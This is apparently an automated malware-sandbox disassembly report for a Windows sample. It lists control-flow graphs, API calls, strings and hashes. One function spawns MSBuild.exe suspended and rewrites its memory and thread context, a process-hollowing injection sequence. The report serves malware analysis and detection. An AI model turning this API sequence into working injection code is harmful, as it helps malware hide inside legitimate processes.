6dcf7e ___scrt_is_nonwritable_in_current_image 18368->18369 18381 6dcc88 EnterCriticalSection 18369->18381 18371 6dcf8d 18380 6dcfd2 18371->18380 18382 6dca3f 18371->18382 18373 6d1374 __dosmaperr 14 API calls 18375 6dcfd9 18373->18375 18374 6dcfb9 FlushFileBuffers 18374->18375 18395 6dd008 18375->18395 18380->18373 18381->18371 18383 6dca4c 18382->18383 18384 6dca61 18382->18384 18385 6d1387 __dosmaperr 14 API calls 18383->18385 18386 6d1387 __dosmaperr 14 API calls 18384->18386 18388 6dca86 18384->18388 18387 6dca51 18385->18387 18389 6dca91 18386->18389 18388->18374 18398->18349 18399->18334 16738 6f019e 16743 6f01d4 16738->16743 16739 6f0321 GetPEB 16740 6f0333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 16739->16740 16741 6f03da WriteProcessMemory 16740->16741 16740->16743 16742 6f041f 16741->16742 16744 6f0424 WriteProcessMemory 16742->16744 16745 6f0461 WriteProcessMemory Wow64SetThreadContext ResumeThread 16742->16745 16743->16739 16743->16740 16744->16742

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,006F0110,006F0100), ref: 006F0334
                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 006F0347
                                                                                                          • Wow64GetThreadContext.KERNEL32(0000008C,00000000), ref: 006F0365
                                                                                                          • ReadProcessMemory.KERNELBASE(00000094,?,006F0154,00000004,00000000), ref: 006F0389
                                                                                                          • VirtualAllocEx.KERNELBASE(00000094,?,?,00003000,00000040), ref: 006F03B4
                                                                                                          • WriteProcessMemory.KERNELBASE(00000094,00000000,?,?,00000000,?), ref: 006F040C
                                                                                                          • WriteProcessMemory.KERNELBASE(00000094,00400000,?,?,00000000,?,00000028), ref: 006F0457
                                                                                                          • WriteProcessMemory.KERNELBASE(00000094,?,?,00000004,00000000), ref: 006F0495
                                                                                                          • Wow64SetThreadContext.KERNEL32(0000008C,029E0000), ref: 006F04D1
                                                                                                          • ResumeThread.KERNELBASE(0000008C), ref: 006F04E0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                          • API String ID: 2687962208-3857624555
                                                                                                          • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                          • Instruction ID: 01d5ece6b7f8144ae36a8b347b20d909941a5762dcbd93cc50d850521a9885f8
                                                                                                          • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                          • Instruction Fuzzy Hash: 5DB10A7664064AAFDB60CF68CC80BEA73A5FF88714F158114EA0CAB342D774FA51CB94

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$AddressCloseCreateHandleProcSize
                                                                                                          • String ID: CreateFileA
                                                                                                          • API String ID: 2547132502-1429953656
                                                                                                          • Opcode ID: 617be803a6b75e076c4b13b3435b25613dc44f9d328e84954180633175b84aab
                                                                                                          • Instruction ID: 91baa2a37258f921140ddebc381fd2ba2dd5bcd4b2b7fedb82596daafc8be04b
                                                                                                          • Opcode Fuzzy Hash: 617be803a6b75e076c4b13b3435b25613dc44f9d328e84954180633175b84aab
                                                                                                          • Instruction Fuzzy Hash: E741C3B09083498FDB00EFA8D4987AEBBF1EF49310F00852DE859AB351D7749549CF92

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Handle$AddressCloseConsoleCreateFreeModuleObjectProcSingleThreadWait
                                                                                                          • String ID: FreeConsole$kernel32.dll
                                                                                                          • API String ID: 1818784962-2564406000
                                                                                                          • Opcode ID: e6f55ed841a651ae9d1225725dacb2dc4b29647f6c28dd8d7dca5015096d7ad3
                                                                                                          • Instruction ID: 2796f4e22746039ec1e910edd0490eeb8759645120122c13189ff44bb62eef80
                                                                                                          • Opcode Fuzzy Hash: e6f55ed841a651ae9d1225725dacb2dc4b29647f6c28dd8d7dca5015096d7ad3
                                                                                                          • Instruction Fuzzy Hash: 9021A8B09043499FDB40EFB8D98979EBBF1FB44300F40892DE8599B250EB749648CF92

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 45 6d62b2-6d62be 46 6d6350-6d6353 45->46 47 6d6359 46->47 48 6d62c3-6d62d4 46->48 49 6d635b-6d635f 47->49 50 6d62d6-6d62d9 48->50 51 6d62e1-6d62fa LoadLibraryExW 48->51 52 6d62df 50->52 53 6d6379-6d637b 50->53 54 6d62fc-6d6305 GetLastError 51->54 55 6d6360-6d6370 51->55 57 6d634d 52->57 53->49 58 6d633e-6d634b 54->58 59 6d6307-6d6319 call 6d9974 54->59 55->53 56 6d6372-6d6373 FreeLibrary 55->56 56->53 57->46 58->57 59->58 62 6d631b-6d632d call 6d9974 59->62 62->58 65 6d632f-6d633c LoadLibraryExW 62->65 65->55 65->58
                                                                                                          APIs
                                                                                                          • FreeLibrary.KERNEL32(00000000,?,006D63C1,00000000,00000000,00000000,?,?,?,006D603F,00000022,FlsSetValue,006E8AF8,006E8B00,?), ref: 006D6373
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary
                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                          • API String ID: 3664257935-537541572
                                                                                                          • Opcode ID: dd12038cf5e1147218962d83901b3fee0cf8660f8473c434a715f9ed31d21b6b
                                                                                                          • Instruction ID: 7582bc0679f4c94040c23d1eac16d609c1203fd6d8bb6a84ef2ad1279e6bff75
                                                                                                          • Opcode Fuzzy Hash: dd12038cf5e1147218962d83901b3fee0cf8660f8473c434a715f9ed31d21b6b
                                                                                                          • Instruction Fuzzy Hash: FD21EB31E01214E7D7219B65DC45AEE375BAB527A0F162226FD16AB3D1D731ED00C6E0

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 66 6d6a9a-6d6ab3 67 6d6ac9-6d6ace 66->67 68 6d6ab5-6d6ac5 call 6cf1bd 66->68 70 6d6adb-6d6b01 call 6d53af 67->70 71 6d6ad0-6d6ad8 67->71 68->67 74 6d6ac7 68->74 76 6d6c77-6d6c88 call 6c7231 70->76 77 6d6b07-6d6b12 70->77 71->70 74->67 79 6d6b18-6d6b1d 77->79 80 6d6c6a 77->80 83 6d6b1f-6d6b28 call 6c9fd0 79->83 84 6d6b36-6d6b41 call 6d5361 79->84 81 6d6c6c 80->81 86 6d6c6e-6d6c75 call 6c9f67 81->86 83->81 91 6d6b2e-6d6b34 83->91 84->81 93 6d6b47 84->93 86->76 94 6d6b4d-6d6b52 91->94 93->94 94->81 95 6d6b58-6d6b6d call 6d53af 94->95 95->81 98 6d6b73-6d6b85 call 6d6163 95->98 100 6d6b8a-6d6b8e 98->100 100->81 101 6d6b94-6d6b9c 100->101 102 6d6b9e-6d6ba3 101->102 103 6d6bd6-6d6be2 101->103 102->86 104 6d6ba9-6d6bab 102->104 105 6d6c5f 103->105 106 6d6be4-6d6be6 103->106 104->81 107 6d6bb1-6d6bcb call 6d6163 104->107 110 6d6c61-6d6c68 call 6c9f67 105->110 108 6d6be8-6d6bf1 call 6c9fd0 106->108 109 6d6bfb-6d6c06 call 6d5361 106->109 107->86 119 6d6bd1 107->119 108->110 120 6d6bf3-6d6bf9 108->120 109->110 121 6d6c08 109->121 110->81 119->81 122 6d6c0e-6d6c13 120->122 121->122 122->110 123 6d6c15-6d6c2d call 6d6163 122->123 123->110 126 6d6c2f-6d6c36 123->126 127 6d6c38-6d6c39 126->127 128 6d6c57-6d6c5d 126->128 129 6d6c3a-6d6c4c call 6d5471 127->129 128->129 129->110 132 6d6c4e-6d6c55 call 6c9f67 129->132 132->86
                                                                                                          APIs
                                                                                                          • __alloca_probe_16.LIBCMT ref: 006D6B1F
                                                                                                          • __alloca_probe_16.LIBCMT ref: 006D6BE8
                                                                                                          • __freea.LIBCMT ref: 006D6C4F
                                                                                                            • Part of subcall function 006D5361: RtlAllocateHeap.NTDLL(00000000,006D72E5,?,?,006D72E5,00000220,?,?,?), ref: 006D5393
                                                                                                          • __freea.LIBCMT ref: 006D6C62
                                                                                                          • __freea.LIBCMT ref: 006D6C6F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1423051803-0
                                                                                                          • Opcode ID: 3f2d96be243c7f169ddb4c9e8e9ec6f358034618ee56876e53b3d5d6ef301eda
                                                                                                          • Instruction ID: 9c7e242b89285c7061b3d002a07f5b4f0cfd808715befe883f654b6ad7402c0e
                                                                                                          • Opcode Fuzzy Hash: 3f2d96be243c7f169ddb4c9e8e9ec6f358034618ee56876e53b3d5d6ef301eda
                                                                                                          • Instruction Fuzzy Hash: 1151B272A10206AFEB205FA5CC85EFB76ABEF44B50F19002EFD45D6351EB71DC1096A4

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 135 6c1db0-6c1e7e call 6c1000 * 2 GetProcAddress 140 6c1e8f-6c1ecb VirtualProtect 135->140 141 6c1e84-6c1e8c 135->141 143 6c1edc-6c1ef3 call 6c7231 140->143 144 6c1ed1-6c1ed7 call 6c1bd0 140->144 141->140 144->143
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProcProtectVirtual
                                                                                                          • String ID: @$VirtualProtect
                                                                                                          • API String ID: 3759838892-29487290
                                                                                                          • Opcode ID: c2fc2dede218def8903817009b4ffc0bf6737dbbaf5250d2e0fca661bd0c053e
                                                                                                          • Instruction ID: 1a39bf10bc275509c2bb5d5c11549f831b7f46fe989772c777423bf2bddb6e0c
                                                                                                          • Opcode Fuzzy Hash: c2fc2dede218def8903817009b4ffc0bf6737dbbaf5250d2e0fca661bd0c053e
                                                                                                          • Instruction Fuzzy Hash: 3D41D2B0900209DFDB04DFA9D998AAEBBF1FF48304F10841EE848AB351D775A944CF85

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(006CF200,?,006CF3B5,00000000,?,?,006CF200,6BA95F62,?,006CF200), ref: 006CF304
                                                                                                          • TerminateProcess.KERNEL32(00000000,?,006CF3B5,00000000,?,?,006CF200,6BA95F62,?,006CF200), ref: 006CF30B
                                                                                                          • ExitProcess.KERNEL32 ref: 006CF31D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                          • String ID:
                                                                                                          • API String ID: 1703294689-0
                                                                                                          • Opcode ID: 71ec827406b1d5a5a09974b351bf5840ff27d8ad5b250bbd28fde8b158ab5df3
                                                                                                          • Instruction ID: 85a9f1c0351216cdeb98ff5ed73d09545d5ff605cab486fd2c73ab489cedb53d
                                                                                                          • Opcode Fuzzy Hash: 71ec827406b1d5a5a09974b351bf5840ff27d8ad5b250bbd28fde8b158ab5df3
                                                                                                          • Instruction Fuzzy Hash: A7D09E31000288BFCF413FA1DC4DDA93F6BEF443417445028B90949172CB76D952DB94

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 155 6dd014-6dd036 156 6dd03c-6dd03e 155->156 157 6dd229 155->157 158 6dd06a-6dd08d 156->158 159 6dd040-6dd05f call 6d1c08 156->159 160 6dd22b-6dd22f 157->160 162 6dd08f-6dd091 158->162 163 6dd093-6dd099 158->163 166 6dd062-6dd065 159->166 162->163 165 6dd09b-6dd0ac 162->165 163->159 163->165 167 6dd0bf-6dd0cf call 6dd341 165->167 168 6dd0ae-6dd0bc call 6dbdc2 165->168 166->160 173 6dd118-6dd12a 167->173 174 6dd0d1-6dd0d7 167->174 168->167 177 6dd12c-6dd132 173->177 178 6dd181-6dd1a1 WriteFile 173->178 175 6dd0d9-6dd0dc 174->175 176 6dd100-6dd116 call 6dd3be 174->176 179 6dd0de-6dd0e1 175->179 180 6dd0e7-6dd0f6 call 6dd785 175->180 196 6dd0f9-6dd0fb 176->196 184 6dd16d-6dd17a call 6dd7ed 177->184 185 6dd134-6dd137 177->185 182 6dd1ac 178->182 183 6dd1a3-6dd1a9 GetLastError 178->183 179->180 186 6dd1c1-6dd1c4 179->186 180->196 190 6dd1af-6dd1ba 182->190 183->182 195 6dd17f 184->195 191 6dd159-6dd16b call 6dd9b1 185->191 192 6dd139-6dd13c 185->192 199 6dd1c7-6dd1c9 186->199 197 6dd1bc-6dd1bf 190->197 198 6dd224-6dd227 190->198 202 6dd154-6dd157 191->202 192->199 200 6dd142-6dd14f call 6dd8c8 192->200 195->202 196->190 197->186 198->160 203 6dd1cb-6dd1d0 199->203 204 6dd1f7-6dd203 199->204 200->202 202->196 208 6dd1e9-6dd1f2 call 6d1400 203->208 209 6dd1d2-6dd1e4 203->209 206 6dd20d-6dd21f 204->206 207 6dd205-6dd20b 204->207 206->166 207->157 207->206 208->166 209->166
                                                                                                          APIs
                                                                                                            • Part of subcall function 006DD3BE: GetConsoleOutputCP.KERNEL32(6BA95F62,00000000,00000000,?), ref: 006DD421
                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,006CD892,?,006CDAF4), ref: 006DD199
                                                                                                          • GetLastError.KERNEL32(?,006CD892,?,006CDAF4,?,006CDAF4,?,?,?,?,?,?,?,?,?,?), ref: 006DD1A3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 2915228174-0
                                                                                                          • Opcode ID: bac911799e68f97e8e72c08ab38b599b9014e339bdec150e8831f0c426f7d065
                                                                                                          • Instruction ID: 4d3eb77ea00f9a83288065f54ee749f10dcba8929a31bb4780010825d60a3c6a
                                                                                                          • Opcode Fuzzy Hash: bac911799e68f97e8e72c08ab38b599b9014e339bdec150e8831f0c426f7d065
                                                                                                          • Instruction Fuzzy Hash: 906182B1D00119AFDF11EFA8DC84AEEBBBAAF59304F15014AE904A7352D376D942CB90

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 212 6d6f18-6d6f40 call 6d711d 215 6d7105-6d7106 call 6d718e 212->215 216 6d6f46-6d6f4c 212->216 219 6d710b-6d710d 215->219 218 6d6f4f-6d6f55 216->218 220 6d6f5b-6d6f67 218->220 221 6d7051-6d7070 call 6cc6f0 218->221 223 6d710e-6d711c call 6c7231 219->223 220->218 224 6d6f69-6d6f6f 220->224 230 6d7073-6d7078 221->230 225 6d7049-6d704c 224->225 226 6d6f75-6d6f81 IsValidCodePage 224->226 225->223 226->225 229 6d6f87-6d6f8e 226->229 232 6d6fb0-6d6fbd GetCPInfo 229->232 233 6d6f90-6d6f9c 229->233 234 6d707a-6d707f 230->234 235 6d70b5-6d70bf 230->235 238 6d703d-6d7043 232->238 239 6d6fbf-6d6fde call 6cc6f0 232->239 237 6d6fa0-6d6fab 233->237 240 6d7081-6d7089 234->240 241 6d70b2 234->241 235->230 236 6d70c1-6d70eb call 6d7469 235->236 251 6d70ec-6d70fb 236->251 243 6d70fd-6d70fe call 6d74a7 237->243 238->215 238->225 239->237 253 6d6fe0-6d6fe7 239->253 245 6d708b-6d708e 240->245 246 6d70aa-6d70b0 240->246 241->235 252 6d7103 243->252 250 6d7090-6d7096 245->250 246->234 246->241 250->246 254 6d7098-6d70a8 250->254 251->243 251->251 252->219 255 6d6fe9-6d6fee 253->255 256 6d7013-6d7016 253->256 254->246 254->250 255->256 257 6d6ff0-6d6ff8 255->257 258 6d701b-6d7022 256->258 260 6d700b-6d7011 257->260 261 6d6ffa-6d7001 257->261 258->258 259 6d7024-6d7038 call 6d7469 258->259 259->237 260->255 260->256 263 6d7002-6d7009 261->263 263->260 263->263
                                                                                                          APIs
                                                                                                            • Part of subcall function 006D711D: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 006D7148
                                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,006D7328,?,00000000,?,?,?), ref: 006D6F79
                                                                                                          • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,006D7328,?,00000000,?,?,?), ref: 006D6FB5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CodeInfoPageValid
                                                                                                          • String ID:
                                                                                                          • API String ID: 546120528-0
                                                                                                          • Opcode ID: b75b976de664dda8135582f009678d8bedff3a4eb5640a07ebab261e7b8e0fa9
                                                                                                          • Instruction ID: 41703472429f1d8e4ecb13629d04649db8ace2cba4c83951a73722c42082d781
                                                                                                          • Opcode Fuzzy Hash: b75b976de664dda8135582f009678d8bedff3a4eb5640a07ebab261e7b8e0fa9
                                                                                                          • Instruction Fuzzy Hash: 1B5127B0D042458EDB21CF36C881AFABBF7EF55304F18446FD0868B391E6759946CB92

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 265 6dd7ed-6dd842 call 6ca0b0 268 6dd844 265->268 269 6dd8b7-6dd8c7 call 6c7231 265->269 270 6dd84a 268->270 272 6dd850-6dd852 270->272 274 6dd86c-6dd891 WriteFile 272->274 275 6dd854-6dd859 272->275 278 6dd8af-6dd8b5 GetLastError 274->278 279 6dd893-6dd89e 274->279 276 6dd85b-6dd861 275->276 277 6dd862-6dd86a 275->277 276->277 277->272 277->274 278->269 279->269 280 6dd8a0-6dd8ab 279->280 280->270 281 6dd8ad 280->281 281->269
                                                                                                          APIs
                                                                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,006DD17F,?,006CDAF4,?,?,?,00000000), ref: 006DD889
                                                                                                          • GetLastError.KERNEL32(?,006DD17F,?,006CDAF4,?,?,?,00000000,?,?,?,?,?,006CD892,?,006CDAF4), ref: 006DD8AF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2112477410.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2112458323.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112508230.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112531636.00000000006F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112560278.00000000006F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112581102.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2112601781.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 442123175-0
                                                                                                          • Opcode ID: 6cc35d8170422d15ef8ec2eca7995a1ec9bffe3dbd969349547d3ddea95d709c
                                                                                                          • Instruction ID: 5f50bc3c0babb97fba6c50054668b4b3467fbd81e0cba7cd2d4a6450dbdb2911
                                                                                                          • Opcode Fuzzy Hash: 6cc35d8170422d15ef8ec2eca7995a1ec9bffe3dbd969349547d3ddea95d709c
                                                                                                          • Instruction Fuzzy Hash: B1218030E002189BDB16DF19DC80AE9B7BAEB58305F1441AAE906D7351D6309E42CBA4

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
